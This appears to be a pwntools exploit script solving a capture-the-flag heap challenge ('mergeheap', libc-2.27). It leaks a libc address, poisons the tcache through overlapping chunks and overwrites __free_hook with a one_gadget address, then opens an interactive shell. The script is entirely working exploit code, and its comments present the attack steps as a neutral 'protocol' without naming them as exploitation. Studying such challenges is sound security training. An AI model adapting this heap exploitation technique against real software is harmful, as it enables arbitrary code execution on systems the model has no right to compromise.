| from pwn import* from LibcSearcher import *
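# Spawn the local target binary and load the libc shipped with it for symbol
# lookups. Both paths are hard-coded relative to the working directory.
p = process("./mergeheap")
# Log level, OS and arch are set in a single context() call; a separate
# `context.log_level = "debug"` assignment before it would be redundant
# because this call sets the same value again.
context(log_level='debug', os='linux', arch='amd64')
libc = ELF('./libc-2.27.so')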
def _choose(option, *answers):
    """Send menu option `option` after the '>>' prompt, then answer each
    (prompt, value) pair in `answers` in order.

    Everything goes through the module-level tube `p`. Values are passed
    to sendlineafter unchanged, so callers are responsible for str/bytes.
    """
    p.sendlineafter('>>', option)
    for prompt, value in answers:
        p.sendlineafter(prompt, value)


def add(size, content):
    """Menu option 1: answer the 'len:' prompt with `size` and the
    'content:' prompt with `content`."""
    _choose('1', ('len:', str(size)), ('content:', content))


def show(index):
    """Menu option 2: answer the 'idx:' prompt with `index`."""
    _choose('2', ('idx:', str(index)))


def free(index):
    """Menu option 3: answer the 'idx:' prompt with `index`."""
    _choose('3', ('idx:', str(index)))


def merge(index1, index2):
    """Menu option 4: answer 'idx1:' with `index1` and 'idx2:' with `index2`."""
    _choose('4', ('idx1:', str(index1)), ('idx2:', str(index2)))


# First batch: eight identical 0x80-byte entries.
for _ in range(8):
    add(0x80, 'cccc')
# Release the whole first batch: indices 1..7 first, index 0 last.
# The order is part of the protocol with the target and must not change.
for slot in [*range(1, 8), 0]:
    free(slot)
# Leak phase: write an 8-byte marker, print entry 0 back, and read the bytes
# that follow the marker as a little-endian pointer.
add(0x8,'cccccccc')
show(0)
p.recvuntil('cccccccc')
# Read up to and including the first 0x7f byte, zero-pad to 8 bytes, unpack LE.
# Assumes the printed value's most significant non-zero byte is 0x7f; if the
# output contains an earlier 0x7f byte the value is truncated — TODO confirm.
main_addr=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))
print(hex(main_addr-0x80))
# The constants 96 and 0x80 are not derived from the binary at runtime;
# NOTE(review): they are specific to the bundled libc-2.27 build — verify
# against that file before reusing with any other libc.
main_arena=main_addr-96-0x80
malloc=main_arena-0x10
base=malloc-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
# Three candidate offsets for this libc; only one[1] is used below.
one=[0x4f2c5,0x4f322,0x10a38c]
one_gadget=base+one[1]
# Second batch of allocations. The sizes and their order are presumably
# chosen for the target's allocator state; treat the sequence as fixed and
# do not reorder or merge these calls.
add(0x60,'aaaa\n')
add(0x30,'a'*0x30)
add(0x38,'a'*0x38)
add(0x100,'a')
add(0x68,'a')
add(0x20,'a')
add(0x20,'c')
add(0x20,'f')
add(0x20,'d')
# Frees interleaved with a single merge(); the relative order of these five
# calls is part of the sequence the target expects and must be kept.
free(5)
free(7)
free(8)
merge(2,3)
free(6)
# 0x40-byte payload: 0x28 filler bytes, then the 8-byte LE values 0x31,
# free_hook and 0 (p64 packs each as a little-endian u64).
payload=b'a'*0x28+p64(0x31)+p64(free_hook)+p64(0)
add(0x100,payload)
add(0x20,'aaaa')
add(0x20,'cccc')
add(0x20,p64(one_gadget))
# free(9) is the last interaction sent before handing over the terminal.
free(9)
# Brief pause so any output from the target arrives before interactive mode.
sleep(1)
p.interactive()